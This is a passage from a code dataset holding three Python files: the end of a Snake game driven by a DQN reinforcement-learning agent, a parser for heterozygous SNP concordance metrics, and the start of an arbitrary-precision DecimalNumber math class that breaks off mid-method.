pygame.draw.rect(gameDisplay,red,[self.body_list[-1][0],self.body_list[-1][1],self.body_thickness,self.body_thickness])\r\n pygame.display.update()\r\n\r\n#define apple class\r\nclass Apple():\r\n def __init__(self):\r\n self.thickness = 20\r\n self.x_pos = round(random.randrange(0,display_width-self.thickness)/self.thickness)*self.thickness\r\n self.y_pos = round(random.randrange(0,display_height-self.thickness)/self.thickness)*self.thickness\r\n def draw(self):\r\n pygame.draw.rect(gameDisplay,blue,[self.x_pos,self.y_pos,self.thickness,self.thickness])\r\n pygame.display.update()\r\n\r\n#define apple eaten function\r\n\r\ndef apple_eaten(snake_obj,apple_obj):\r\n x = False\r\n if apple_obj.x_pos == snake_obj.head_x and apple_obj.y_pos == snake_obj.head_y:\r\n x = True\r\n snake_obj.length_counter += 1\r\n apple_obj.x_pos = round(random.randrange(0,display_width-apple_obj.thickness)/apple_obj.thickness)*apple_obj.thickness\r\n apple_obj.y_pos = round(random.randrange(0,display_height-apple_obj.thickness)/apple_obj.thickness)*apple_obj.thickness\r\n while True:\r\n if (apple_obj.x_pos,apple_obj.y_pos) in snake_obj.body_list:\r\n apple_obj.x_pos = round(random.randrange(0,display_width-apple_obj.thickness)/apple_obj.thickness)*apple_obj.thickness\r\n apple_obj.y_pos = round(random.randrange(0,display_height-apple_obj.thickness)/apple_obj.thickness)*apple_obj.thickness\r\n else:\r\n break\r\n return x\r\n\r\n\r\n#define game over function\r\n\r\ndef show_game_over_screen():\r\n gameOver = True\r\n gameExit = False\r\n text = \"game over press p to play again or q to quit\"\r\n text_to_screen = font.render(text,True,blue)\r\n text_rect = text_to_screen.get_rect()\r\n text_rect.center = display_width/2 , display_height/2\r\n while gameOver:\r\n gameDisplay.blit(text_to_screen,text_rect)\r\n pygame.display.update()\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n gameOver = False\r\n gameExit = True\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_p:\r\n GameLoop()\r\n gameOver = False\r\n gameExit = True\r\n elif event.key == pygame.K_q:\r\n gameOver = False\r\n gameExit = True\r\n return gameOver,gameExit\r\n\r\n\r\n#define collision function\r\n\r\ndef collision(snake_obj):\r\n gameOver = False\r\n if snake_obj.head_x >= display_width or snake_obj.head_x < 0 or snake_obj.head_y >= display_height or snake_obj.head_y < 0:\r\n gameOver = True\r\n else:\r\n for XnY in snake_obj.body_list[:-1]:\r\n if XnY == snake_obj.body_list[-1]:\r\n gameOver = True\r\n break\r\n return gameOver\r\n\r\n\r\n#define show score function\r\n\r\ndef show_score(snake_obj):\r\n text = str(snake_obj.length_counter-1)\r\n text_to_screen = font.render(text,True,green)\r\n gameDisplay.blit(text_to_screen,[0,0])\r\n pygame.display.update()\r\n\r\n\r\ndef mod(x):\r\n if x>=0:\r\n return x\r\n return -x\r\n\r\ndef get_action(act):\r\n print(act , \"\\n\")\r\n\r\n\r\n\r\n#defining get_state function\r\ndef get_state(snake_obj,apple_obj):\r\n data_u = snake_obj.head_y / snake_obj.body_thickness\r\n data_l = snake_obj.head_x / snake_obj.body_thickness\r\n data_r = (display_width - snake_obj.head_x - snake_obj.body_thickness)/snake_obj.body_thickness\r\n data_d = (display_height - snake_obj.head_y - snake_obj.body_thickness)/snake_obj.body_thickness\r\n data_ul = 0\r\n data_ur = 0\r\n data_dl = 0\r\n data_dr = 0\r\n if data_u > data_l:\r\n data_ul = data_l * 2 ** .5\r\n else:\r\n data_ul = data_u * 2 ** .5\r\n\r\n if data_u > data_r:\r\n data_ur = data_r * 2 ** .5\r\n else:\r\n data_ur = data_u * 2 ** .5\r\n\r\n if data_d > data_l:\r\n data_dl = data_l * 2 ** .5\r\n else:\r\n data_dl = data_d * 2 ** .5\r\n\r\n if data_d > data_r:\r\n data_dr = data_r * 2 ** .5 - (apple_obj.thickness/snake_obj.body_thickness) * 2 ** .5\r\n else:\r\n data_dr = data_d * 2 ** .5 - (apple_obj.thickness/snake_obj.body_thickness) * 2 ** .5\r\n\r\n data_ul = round(data_ul,2)\r\n data_ur = round(data_ur,2)\r\n data_dl = round(data_dl,2)\r\n data_dr = round(data_dr,2)\r\n\r\n bin_app_u = 0\r\n bin_app_d = 0\r\n bin_app_r = 0\r\n bin_app_l = 0\r\n bin_app_ul = 0\r\n bin_app_ur = 0\r\n bin_app_dl = 0\r\n bin_app_dr = 0\r\n\r\n if mod(apple_obj.x_pos - snake_obj.head_x) == mod(apple_obj.y_pos - snake_obj.head_y):\r\n if apple_obj.x_pos > snake_obj.head_x and apple_obj.y_pos > snake_obj.head_y:\r\n bin_app_dr = 1\r\n elif apple_obj.x_pos < snake_obj.head_x and apple_obj.y_pos < snake_obj.head_y:\r\n bin_app_ul = 1\r\n elif apple_obj.x_pos > snake_obj.head_x and apple_obj.y_pos < snake_obj.head_y:\r\n bin_app_ur = 1\r\n elif apple_obj.x_pos < snake_obj.head_x and apple_obj.y_pos > snake_obj.head_y:\r\n bin_app_dl = 1\r\n elif apple_obj.x_pos == snake_obj.head_x:\r\n if apple_obj.y_pos > snake_obj.head_y:\r\n bin_app_d = 1\r\n else:\r\n bin_app_u = 1\r\n elif apple_obj.y_pos == snake_obj.head_y:\r\n if apple_obj.x_pos > snake_obj.head_x:\r\n bin_app_r = 1\r\n else:\r\n bin_app_l = 1\r\n\r\n\r\n\r\n bin_bod_u = 0\r\n bin_bod_d = 0\r\n bin_bod_r = 0\r\n bin_bod_l = 0\r\n bin_bod_ul = 0\r\n bin_bod_ur = 0\r\n bin_bod_dl = 0\r\n bin_bod_dr = 0\r\n for XnY in snake_obj.body_list[:-1]:\r\n if mod(XnY[0] - snake_obj.head_x) == mod(XnY[1] - snake_obj.head_y):\r\n if XnY[0] > snake_obj.head_x and XnY[1] > snake_obj.head_y:\r\n bin_bod_dr = 1\r\n elif XnY[0] < snake_obj.head_x and XnY[1] < snake_obj.head_y:\r\n bin_bod_ul = 1\r\n elif XnY[0] > snake_obj.head_x and XnY[1] < snake_obj.head_y:\r\n bin_bod_ur = 1\r\n elif XnY[0] < snake_obj.head_x and XnY[1] > snake_obj.head_y:\r\n bin_bod_dl = 1\r\n elif XnY[0] == snake_obj.head_x:\r\n if XnY[1] > snake_obj.head_y:\r\n bin_bod_d = 1\r\n else:\r\n bin_bod_u = 1\r\n elif XnY[1] == snake_obj.head_y:\r\n if XnY[0] > snake_obj.head_x:\r\n bin_bod_r = 1\r\n else:\r\n bin_bod_l = 1\r\n\r\n state = [data_l,bin_app_l,bin_bod_l,data_ul,bin_app_ul,bin_bod_ul,data_u,bin_app_u,bin_bod_u,data_ur,bin_app_ur,bin_bod_ur,data_r,bin_app_r,bin_bod_r,data_dr,bin_app_dr,bin_bod_dr,data_d,bin_app_d,bin_bod_d,data_dl,bin_app_dl,bin_bod_dl]\r\n #state = [data_u,data_l,data_r,data_d,data_ul,data_ur,data_dl,data_dr,bin_app_u,bin_app_l,bin_app_r,bin_app_d,bin_app_ul,bin_app_ur,bin_app_dl,bin_app_dr,bin_bod_u,bin_bod_l,bin_bod_r,bin_bod_d,bin_bod_ul,bin_bod_ur,bin_bod_dl,bin_bod_dr]\r\n return state\r\n\r\n\r\ndef GameLoop():\r\n #global gameDisplay\r\n global display_width\r\n global display_height\r\n state_size = 24\r\n action_size = 4\r\n max_score = 0\r\n agent = DQNAgent(state_size, action_size)\r\n print('state size:' ,state_size)\r\n print('action size: ', action_size)\r\n batch_size = 256\r\n output_dir = 'C:/Users/subha/Desktop/python_codes/project4'\r\n for e in range(EPISODES):\r\n gameDisplay = pygame.display.set_mode((display_width,display_height),pygame.RESIZABLE)\r\n gameOver = False\r\n score = 0\r\n counter = 0\r\n action_performed = 0\r\n snake_obj = Snake()\r\n apple_obj = Apple()\r\n C_state = get_state(snake_obj,apple_obj)\r\n C_state = np.array(C_state)\r\n C_state = np.reshape(C_state,[1,state_size])\r\n while not gameOver:\r\n reward = -1\r\n gameDisplay.fill(black)\r\n pygame.display.update()\r\n action_performed = agent.act(C_state)\r\n apple_obj.draw()\r\n snake_obj.draw(action_performed)\r\n temp = apple_eaten(snake_obj,apple_obj)\r\n gameOver = collision(snake_obj)\r\n show_score(snake_obj)\r\n N_state = get_state(snake_obj,apple_obj)\r\n N_state = np.array(N_state)\r\n N_state = np.reshape(N_state,[1,state_size])\r\n #print(C_state[0],\"->\",N_state[0])\r\n if gameOver == True:\r\n reward -= 100\r\n if temp == True:\r\n counter = 0\r\n reward += 100\r\n if snake_obj.length_counter-1 > max_score:\r\n max_score = snake_obj.length_counter-1\r\n agent.update_target_model()\r\n\r\n agent.remember(C_state, action_performed, reward, N_state, gameOver)\r\n C_state = N_state\r\n score += reward\r\n counter+=1\r\n if counter == round((display_width / snake_obj.body_thickness) * (display_height / snake_obj.body_thickness) * .7) :\r\n break\r\n clock.tick(fps)\r\n\r\n print(\"episode: {}/{}, score: {}, e: {:.2}\".format(e, EPISODES, score, agent.epsilon))\r\n\r\n if len(agent.memory) > batch_size:\r\n print(\"replaying memory----------------->\")\r\n agent.replay(batch_size)\r\n\r\n if e % 50 == 0:\r\n\r\n print('saving the model')\r\n agent.save(output_dir + \"/\" + str(e) + \".hdf5\")\r\n if e%1000 == 0 and e > 0 and display_width < 400:\r\n print(\"updating game display\")\r\n display_width += 40\r\n display_height += 40\r\n\r\n\r\n pygame.quit()\r\n\r\nGameLoop()\r\nquit()\r\n","sub_path":"final3.py","file_name":"final3.py","file_ext":"py","file_size_in_byte":14154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"158593745","text":"def parse(input_file):\n \"\"\"\n parse an hsmetrics file and return a dict\n :param input_file:\n :return:\n \"\"\"\n ret = []\n with open(input_file, 'r') as fh:\n keys = []\n for line in fh:\n if \"VARIANTSSAMPLE\" in line:\n keys = line.strip(\"\\n\").split(\"\\t\")\n break\n\n d = None\n for line in fh:\n values = line.strip(\"\\n\").split(\"\\t\")\n if values != ['']:\n d = dict((keys[x], values[x]) for x in range(0, len(keys)))\n d = fix_values(d)\n ret.append(d)\n break\n\n return ret\n\n\ndef fix_values(d):\n \"\"\"\n cast dict values to correct type\n :param d: dict with values\n :return: dict\n \"\"\"\n int_keys = [\"TOTAL_SNPS\", \"HZ_SNP_COUNT\", \"CONCORDANT_HZ_SNP_COUNT\"]\n float_keys = [\"CONCORDANT_HZ_SNP_FRACTION\"]\n str_keys = [\"VARIANTSSAMPLE\", \"READSSAMPLE\"]\n\n for k in int_keys:\n d[k] = int(d[k])\n for k in float_keys:\n if d[k] != \"\":\n d[k] = float(d[k])\n else:\n d[k] = 0.0\n for k in str_keys:\n d[k] = str(d[k])\n return d\n\n\n#VARIANTSSAMPLE\tREADSSAMPLE\tTOTAL_SNPS\tHZ_SNP_COUNT\tCONCORDANT_HZ_SNP_COUNT\tCONCORDANT_HZ_SNP_FRACTION\n#27150N-TD1-CS1\t27150T-TD1-CS1\t2383\t1395\t1388\t0.9949820788530466\n\n","sub_path":"logconverters/hzconcordance.py","file_name":"hzconcordance.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"66362993","text":"import sys\n\nif sys.implementation.name == \"cpython\": # micropython does not include 'typing' module\n from typing import Tuple\nif sys.implementation.name == \"micropython\": # Just in case...\n pass\n\n\nclass DecimalNumber:\n \"\"\"DecimalNumber is a class for decimal floating point arithmetic with arbitrary precision.\"\"\"\n VERSION = (1, 0, 0)\n VERSION_NAME = \"v1.0.0 - August 2021\"\n DEFAULT_SCALE: int = 16\n DECIMAL_SEP: str = \".\"\n THOUSANDS_SEP: str = \",\"\n USE_THOUSANDS_SEP: bool = False\n PI_NUMBER: int = 31415926535897932384626433832795028841971693993751058209749445923078164062862089986280348253421170679\n PI_SCALE: int = 100\n E_NUMBER: int = 27182818284590452353602874713526624977572470936999595749669676277240766303535475945713821785251664274\n E_SCALE: int = 100\n LN2_NUMBER: int = 6931471805599453094172321214581765680755001343602552541206800094933936219696947156058633269964186875\n LN2_SCALE: int = 100\n _scale: int = DEFAULT_SCALE\n\n def __init__(self, number=0, decimals: int = 0) -> None:\n \"\"\"Initialization of a DecimalNumber.\n These are this posibilities:\n 1) No parameters => number = 0. Example: DecimalNumber()\n 2) An integer => number = integer. Example: DecimalNumber(1)\n 3) Two integers => number and decimals. Example: Decimal(12345, 3) => Number = 12.345\n 4) One string that contains the number. Example: Decimal(\"12.345\") => Number = 12.345\n \"\"\"\n if isinstance(number, int):\n self._is_positive: bool = (number >= 0)\n self._number: int = number if number >= 0 else -number\n if decimals >= 0:\n self._num_decimals: int = decimals\n else:\n raise DecimalNumberExceptionMathDomainError(\n \"__init__: the number of decimals must be positive\")\n self._reduce_to_scale()\n elif isinstance(number, str):\n self.copy_from(DecimalNumber._from_string(number))\n else:\n raise DecimalNumberExceptionBadInit(\n \"Only 'int' or 'str' instances are allowed for initialization\")\n\n @classmethod\n def pi(cls) -> \"DecimalNumber\":\n \"\"\"Calculation of PI using the very fast algorithm present on the\n documentation of the module \"decimal\" of the Python Standard Library:\n https://docs.python.org/3/library/decimal.html#recipes\n \"\"\"\n # If it is precalculated\n if DecimalNumber.PI_SCALE >= DecimalNumber.get_scale():\n s: DecimalNumber = DecimalNumber(DecimalNumber.PI_NUMBER, DecimalNumber.PI_SCALE)\n else:\n # Calculates PI\n scale: int = DecimalNumber.get_scale()\n # extra digits for intermediate steps\n DecimalNumber.set_scale(scale + 4)\n lasts = DecimalNumber(0)\n t = DecimalNumber(3)\n s = DecimalNumber(3)\n n = DecimalNumber(1)\n na = DecimalNumber(0)\n d = DecimalNumber(0)\n da = DecimalNumber(24)\n eight = DecimalNumber(8)\n thirtytwo = DecimalNumber(32)\n while s != lasts:\n lasts.copy_from(s)\n n += na\n na += eight\n d += da\n da += thirtytwo\n t = (t * n) / d\n s += t\n DecimalNumber.set_scale(scale)\n # Stores the calculated PI\n DecimalNumber.PI_NUMBER = (+s)._number # + adjusts to the scale\n DecimalNumber.PI_SCALE = (+s)._num_decimals\n return +s\n\n @classmethod\n def e(cls) -> \"DecimalNumber\":\n \"\"\"Calculation of e.\n It uses the Taylor series:\n e = 1/0! + 1/1! + 1/2! + 1/3! + ... + 1/n!\n \"\"\"\n # If it is precalculated\n if DecimalNumber.E_SCALE >= DecimalNumber.get_scale():\n e: DecimalNumber = DecimalNumber(DecimalNumber.E_NUMBER, DecimalNumber.E_SCALE)\n else:\n scale: int = DecimalNumber.get_scale()\n # extra digits for intermediate steps\n DecimalNumber.set_scale(scale + 4)\n\n i = DecimalNumber(0)\n f = DecimalNumber(1)\n e = DecimalNumber(1)\n e2 = DecimalNumber(0)\n one = DecimalNumber(1)\n while e2 != e:\n e2.copy_from(e)\n i += one\t\t# counter\n f *= i\n t = one / f\n e += t\n\n DecimalNumber.set_scale(scale)\n # Stores the calculated E\n DecimalNumber.E_NUMBER = (+e)._number # + adjusts to the scale\n DecimalNumber.E_SCALE = (+e)._num_decimals\n return +e\n\n @classmethod\n def ln2(cls) -> \"DecimalNumber\":\n \"\"\"Calculation of ln(2).\n ln(2) = -ln(1/2) = -ln(1 - 1/2)\n It uses the Taylor series:\n ln(1-x) = -x -x²/2 - x³/3 ...\n ln(2) = x + x²/2 + x³/3 ... for x = 1/2\n \"\"\"\n # If it is precalculated\n if DecimalNumber.LN2_SCALE >= DecimalNumber.get_scale():\n e: DecimalNumber = DecimalNumber(DecimalNumber.LN2_NUMBER, DecimalNumber.LN2_SCALE)\n else:\n scale: int = DecimalNumber.get_scale()\n DecimalNumber.set_scale(scale + 4) # extra digits for intermediate steps\n\n i = DecimalNumber(0) # counter\n half = DecimalNumber(5, 1) # 0.5\n x = DecimalNumber(1)\n one = DecimalNumber(1)\n e = DecimalNumber(0)\n e2 = DecimalNumber(1)\n while e2 != e:\n e2.copy_from(e)\n i += one\n x *= half\n e += x / i\n\n DecimalNumber.set_scale(scale)\n # Stores the calculated LN2\n DecimalNumber.LN2_NUMBER = (+e)._number # + adjusts to the scale\n DecimalNumber.LN2_SCALE = (+e)._num_decimals\n return +e\n\n def exp(self, inc_scale: bool = True) -> \"DecimalNumber\":\n \"\"\"Calculates exp(n)\n Works for any x, but for speed, it should have |x| < 1.\n For an arbitrary number, to guarantee that |x| < 1, it uses:\n exp(x) = exp(x - m * log(2)) * 2 ^ m ; where m = floor(x / log(2))\n\n Scale is increased if 'inc_false' is True.\n \"\"\"\n scale = DecimalNumber.get_scale()\n # Calculating the necessary extra scale:\n extra = (abs(self) / DecimalNumber(\"2.3\")).to_int_round() + 10\n DecimalNumber.set_scale(scale + extra)\n if abs(self) <= 1:\n r = DecimalNumber._exp_lt_1(self, inc_scale)\n else:\n m = (self / DecimalNumber.ln2()).to_int_truncate()\n r = DecimalNumber._exp_lt_1(self - m * DecimalNumber.ln2()) * (2 ** m)\n\n DecimalNumber.set_scale(scale)\n return +r\n\n @staticmethod\n def _exp_lt_1(n: \"DecimalNumber\", inc_scale: bool = True) -> \"DecimalNumber\":\n \"\"\" Auxiliary function to calculates exp(n)\n Expects |n| < 1 to converge rapidly\n \"\"\"\n if n == 1:\n e = DecimalNumber.e()\n elif n == -1:\n e = 1 / DecimalNumber.e()\n else:\n i = DecimalNumber(0)\n x = DecimalNumber(1)\n f = DecimalNumber(1)\n e = DecimalNumber(1)\n e2 = DecimalNumber(0)\n one = DecimalNumber(1)\n while e2 != e:\n e2.copy_from(e)\n i += one\t\t# counter\n x *= n\n f *= i\n t = x / f\n e += t\n\n # if inc_scale:\n # DecimalNumber.set_scale(scale)\n return +e\n\n def ln(self) -> \"DecimalNumber\":\n \"\"\"Calculates ln(n)\n Newton's method is used to solve: e**a - x = 0 ; a = ln(x)\n \"\"\"\n if self == 1:\n return DecimalNumber(0)\n if self == 0:\n raise DecimalNumberExceptionMathDomainError(\"ln(0) = -Infinite\")\n if self < 0:\n raise DecimalNumberExceptionMathDomainError(\"ln(x) exists for x > 0\")\n n = self\n scale: int = DecimalNumber.get_scale()\n\n # Estimate first value\n DecimalNumber.set_scale(10) # Low scale for this is enough\n e = DecimalNumber.e()\n y0 = DecimalNumber(0)\n y1 = DecimalNumber(1)\n one = DecimalNumber(1)\n p: DecimalNumber = e.clone()\n while p < n:\n y1 += one\n p *= e\n\n DecimalNumber.set_scale(scale) # Restores scale\n DecimalNumber.set_scale(DecimalNumber.get_scale() + 10) # extra digits for intermediate steps\n two = DecimalNumber(2)\n while y0 != y1:\n y0.copy_from(y1)\n y1 = y0 + two * ((n - y0.exp(False)) / (n + y0.exp(False)))\n\n DecimalNumber.set_scale(scale)\n return +y1\n\n def sin(self) -> \"DecimalNumber\":\n \"\"\"Calculates sin(x). x = radians\n It uses the Taylor series: sin(x) = x - x³/3! + x⁵/5! - x⁷/7! ...\n \"\"\"\n x = self.clone()\n scale: int = DecimalNumber.get_scale()\n DecimalNumber.set_scale(scale + 4) # extra digits for intermediate steps\n\n negative_radians: bool = (x < 0)\n if negative_radians:\n x = -x\n # Calculates x mod 2π\n pi = DecimalNumber.pi()\n f: int = (x / (pi * 2)).to_int_truncate()\n if f > 0:\n x -= f * 2 * pi\n\n # Determines the quadrant and reduces the range of x to 0 - π/2\n # sin(-x) = -sin(x) ; cos(-x) = cos(x) ; tan(-x) = -tan(x) \n half_pi = pi / 2\n r = half_pi.clone()\n quadrant: int = 1\n while x > r:\n r += half_pi\n quadrant += 1\n\n if quadrant == 2:\n x = pi - x\n elif quadrant == 3:\n x = x - pi\n elif quadrant == 4:\n x = 2 * pi - x\n\n i = DecimalNumber(1) # counter\n two = DecimalNumber(2)\n n = x.clone()\n d = DecimalNumber(1)\n s = DecimalNumber(1)\n e = n.clone()\n e2 = DecimalNumber(0)\n while e2 != e:\n e2.copy_from(e)\n i += two\n n *= x * x\n d *= i * (i - 1)\n s = -s\n e += (n * s) / d\n\n if quadrant > 2:\n e = -e\n if negative_radians:\n e = -e\n\n DecimalNumber.set_scale(scale)\n return +e\n\n def cos(self) -> \"DecimalNumber\":\n \"\"\"Calculates cos(x). x = radians\n It uses the Taylor series: cos(x) = 1 - x²/2! + x⁴/4! - x⁶/6! ...\n \"\"\"\n x = self.clone()\n scale: int = DecimalNumber.get_scale()\n DecimalNumber.set_scale(scale + 4) # extra digits for intermediate steps\n\n if (x < 0): # cos(-x) = cos(x)\n x = -x\n\n # Calculates x mod 2π\n pi = DecimalNumber.pi()\n f: int = (x / (pi * 2)).to_int_truncate()\n if f > 0:\n x -= f * 2 * pi\n\n # Determines the quadrant and reduces the range of x to 0 - π/2\n half_pi = pi / 2\n r = half_pi.clone()\n quadrant: int = 1\n while x > r:\n r += half_pi\n quadrant += 1\n\n if quadrant == 2:\n x = pi - x\n elif quadrant == 3:\n x = x - pi\n elif quadrant == 4:\n x = 2 * pi - x\n\n i = DecimalNumber(1) # counter\n two = DecimalNumber(2)\n n = DecimalNumber(1)\n d = DecimalNumber(1)\n s = DecimalNumber(1)\n e = n.clone()\n e2 = DecimalNumber(0)\n while e2 != e:\n e2.copy_from(e)\n n *= x * x\n d *= i * (i + 1)\n i += two\n s = -s\n e += (n * s) / d\n\n if quadrant == 2 or quadrant == 3:\n e = -e\n\n DecimalNumber.set_scale(scale)\n return +e\n\n def tan(self) -> \"DecimalNumber\":\n \"\"\"Calculates tan(x) = sin(x) / cos(x). x = radians \"\"\"\n x = self.clone()\n\n # Calculates x mod 2π\n pi = DecimalNumber.pi()\n f: int = (x / (pi * 2)).to_int_truncate()\n if f > 0:\n x -= f * 2 * pi\n\n half_pi = pi / 2\n three_halves_pi = (3 * pi) / 2\n # Determines the quadrant\n r = half_pi.clone()\n quadrant: int = 1\n while x > r:\n r += half_pi\n quadrant += 1\n\n # tan(x) = sin(x) / cos(x) ; if cos(x) == 0 => tan(x) = ∞\n\n if self == half_pi or self == three_halves_pi:\n raise DecimalNumberExceptionDivisionByZeroError(\"tan(x) = ±Infinite\")\n else:\n scale: int = DecimalNumber.get_scale()\n DecimalNumber.set_scale(scale + 4)\n s = x.sin()\n c = x.cos()\n if c == 0:\n DecimalNumber.set_scale(scale)\n raise DecimalNumberExceptionDivisionByZeroError(\"tan(x) = ±Infinite\")\n else:\n t = s / c\n DecimalNumber.set_scale(scale)\n return +t\n\n def asin(self) -> \"DecimalNumber\":\n \"\"\"Calculates asin(x)\n It uses the Taylor series: arcsin(x) = x + 3x³/6 + 15x⁵/336 + ...\n It converges very slowly for |x| near 1. To avoid values near 1:\n If |n| between 0 and 0.707: arcsin(x) is calculated using the series.\n if |n| between 0.707 and 1: arcsin(x) is calculated as pi/2 - arcsin( sqrt(1 - x²) )\n This guarantees arcsin(x) using series with x <= 0.707 ; (sqrt(1/2)).\n \"\"\"\n if self >= -1 and self <= 1:\n if self == -1:\n return -(DecimalNumber.pi() / 2)\n elif self == 1:\n return (DecimalNumber.pi() / 2)\n elif self == 0:\n return DecimalNumber(0)\n\n scale: int = DecimalNumber.get_scale()\n DecimalNumber.set_scale(DecimalNumber.get_scale() + 4) # extra digits for intermediate steps\n\n trick: bool = False\n if abs(self) > DecimalNumber(\"0.707\"):\n trick = True\n x = (1 - self * self).square_root()\n else: \n x = self.clone()\n \n i = DecimalNumber(1) # counter\n one = DecimalNumber(1)\n two = DecimalNumber(2)\n four = DecimalNumber(4)\n n = DecimalNumber(1)\n d = DecimalNumber(1)\n n2 = x.clone()\n e = x.clone()\n e2 = DecimalNumber(0)\n counter: int = 0\n while e2 != e:\n e2.copy_from(e)\n n *= i\n i += two\n d *= i - one\n n2 *= x * x\n e += (n * n2) / (d * i)\n\n if trick:\n if self._is_positive:\n e = DecimalNumber.pi() / 2 - e\n else:\n e = e - DecimalNumber.pi() / 2\n\n DecimalNumber.set_scale(scale)\n return +e\n else:\n raise DecimalNumberExceptionMathDomainError(\"asin(x) admits -1 <= x <= 1 only\")\n\n def acos(self) -> \"DecimalNumber\":\n \"\"\"Calculates acos(x)\n It uses the equivalence: acos(x) = π/2 - asin(x)\n \"\"\"\n if self >= -1 and self <= 1:\n scale: int = DecimalNumber.get_scale()\n DecimalNumber.set_scale(DecimalNumber.get_scale() + 4) # extra digits for intermediate steps\n\n a = (DecimalNumber.pi() / 2) - self.asin()\n\n DecimalNumber.set_scale(scale)\n return +a\n else:\n raise DecimalNumberExceptionMathDomainError(\"acos(x) admits -1 <= x <= 1 only\")\n\n def atan(self) -> \"DecimalNumber\":\n \"\"\"Calculates atan(x)\n It uses: atan(x) = asin( x / sqrt(1 + x²) )\n \"\"\"\n scale: int = DecimalNumber.get_scale()\n DecimalNumber.set_scale(DecimalNumber.get_scale() + 4) # extra digits for intermediate steps\n one = DecimalNumber(1)\n v = self / (one + self * self).square_root()\n a = v.asin()\n\n DecimalNumber.set_scale(scale)\n return +a\n\n\n @staticmethod\n def version() -> str:\n \"\"\"Returns a tuple (MINOR, MINOR, PATCH) with the version of DecimalNumber\"\"\"\n return DecimalNumber.VERSION\n\n @staticmethod\n def version_name() -> str:\n \"\"\"Returns a string with the version of DecimalNumber\"\"\"\n return DecimalNumber.VERSION_NAME\n\n @staticmethod\n def set_scale(num_digits: int) -> None:\n \"\"\"Sets the scale.\n Scale is a class value, the maximum number of decimals that a DecimalNumber can have.\n The default value is 16. The maximum value is only limited by the available\n memory and computer power.\"\"\"\n if num_digits >= 0:\n DecimalNumber._scale = num_digits\n else:\n raise DecimalNumberExceptionMathDomainError(\n \"set_scale: scale must be positive\")\n\n @staticmethod\n def get_scale() -> int:\n \"\"\"Gets the current scale value.\"\"\"\n return DecimalNumber._scale\n\n @staticmethod\n def _parse_number(number: str) -> Tuple[bool, int, int]:\n \"\"\"This is a static and auxiliary method to parse a string containing\n a number. If the string is parsed as a number, it returns three values:\n True --> string correctly parsed as number.\n Integer containing all the digits of the number.\n Integer representing the number of decimals.\n For example: \"-12345.678\" will be parsed and the values returned will be:\n (True, -12345678, 3)\n If the parsing fails, it returns (Falsem 0, 0).\n Note: this is faster than using a regular expression. Also, when using\n the regular expression \"^\\-?[0-9]+\\.?[0-9]*\" and exception was raised when\n using micropython when the string \"number\" was long.\n \"\"\"\n # True: correct\n # Note: \n step: int = 1 # 1: '-', 2: [0-9], 3: '.', 4: [0-9]\n position: int = 0\n integer_number: int = 0\n is_positive: bool = True\n num_decimals: int = 0\n number = tuple(number,) # Faster than indexing the string\n length: int = len(number)\n digits: str = \"0123456789\"\n last_valid: int = 0\n while position < length:\n if step == 1:\n if number[position] == '-':\n is_positive = False\n position += 1\n step = 2\n elif step == 2:\n if digits.find(number[position]) != -1: # [0-9]+\n integer_number = integer_number * \\\n 10 + int(number[position])\n position += 1\n last_valid = position\n else:\n step = 3\n elif step == 3:\n if number[position] == DecimalNumber.DECIMAL_SEP:\n position += 1\n last_valid = position\n step = 4\n elif step == 4:\n if digits.find(number[position]) != -1: # [0-9]*\n integer_number = integer_number * \\\n 10 + int(number[position])\n num_decimals += 1\n position += 1\n last_valid = position\n else:\n break\n if last_valid == length:\n if not is_positive:\n integer_number = -integer_number\n return (True, integer_number, num_decimals)\n else:\n return (False, 0, 0)\n\n @staticmethod\n def _from_string(number: str) -> \"DecimalNumber\":\n \"\"\"static and auxiliary method to create a DecimalNumber from a string.\"\"\"\n correct, integer_number, num_decimals = DecimalNumber._parse_number(\n number)\n if not correct:\n raise DecimalNumberExceptionParseError(\n \"Syntax error parsing '{0}'\".format(number))\n else:\n n = DecimalNumber(integer_number, num_decimals)\n return n\n\n @staticmethod\n def _make_integer_comparable(n1: \"DecimalNumber\", n2: \"DecimalNumber\") -> Tuple[int]:\n \"\"\"Static and auxiliary method to creates two integers from two DecimalNumber,\n without decimals, that can be compared (or sum) by taking into account their decimals.\n Examples:\n n1: 12345.678, n2: 5.4321098 --> i1: 123456780000, i2: 54321098\n n1: 345.1, n2: 7.65: --> i1: 34510, i2: 765\n \"\"\"\n max_decimals: int = max(n1._num_decimals, n2._num_decimals)\n n1_number: int = n1._number\n if not n1._is_positive:\n n1_number = -n1_number\n n2_number: int = n2._number\n if not n2._is_positive:\n n2_number = -n2_number\n if max_decimals > n1._num_decimals:\n n1_number *= 10 ** (max_decimals - n1._num_decimals)\n if max_decimals > n2._num_decimals:\n n2_number *= 10 ** (max_decimals - n2._num_decimals)\n return (n1_number, n2_number)\n\n @staticmethod\n def _isqrt(n: int) -> int:\n \"\"\"Static and auxiliary method to calculate the square root\n of an integer.\n It uses Newton's method with integer division.\n \"\"\"\n if n < 0:\n return 0\n # Calculates initial value\n t: int = n\n x1: int = 1\n while t > 100:\n x1 *= 10\n t //= 100\n # Uses Newton's method\n x2: int = (x1 + n // x1) // 2\n while abs(x2 - x1) > 1:\n x1 = x2\n x2 = (x1 + n // x1) // 2\n return x2\n\n def clone(self) -> \"DecimalNumber\":\n \"\"\"Returns a new DecimalNumber as a clone of self.\"\"\"\n n = DecimalNumber()\n n._number = self._number\n n._num_decimals = self._num_decimals\n n._is_positive = self._is_positive\n return n\n\n def copy_from(self, other: \"DecimalNumber\") -> None:\n \"\"\"It copies on self other DecimalNumber.\"\"\"\n self._number = other._number\n self._num_decimals = other._num_decimals\n self._is_positive = other._is_positive\n\n def square_root(self) -> \"DecimalNumber\":\n \"\"\"Calculates the square root of a DecimalNumber.\n It converts the DecimalNumber to an integer (without decimals), calculates\n its square root using _isqrt() and then it sets the decimals.\n \"\"\"\n n = DecimalNumber()\n if not self._is_positive:\n raise DecimalNumberExceptionMathDomainError(\n \"No square root for negative numbers\")\n\n num_integer: int = self._number\n num_integer *= (10 ** (DecimalNumber.get_scale() * 2))\n additional_decimals: int = 0\n if (self._num_decimals % 2) == 1:\n num_integer *= 10\n additional_decimals = 1\n\n num_integer = DecimalNumber._isqrt(num_integer)\n n._number = num_integer\n 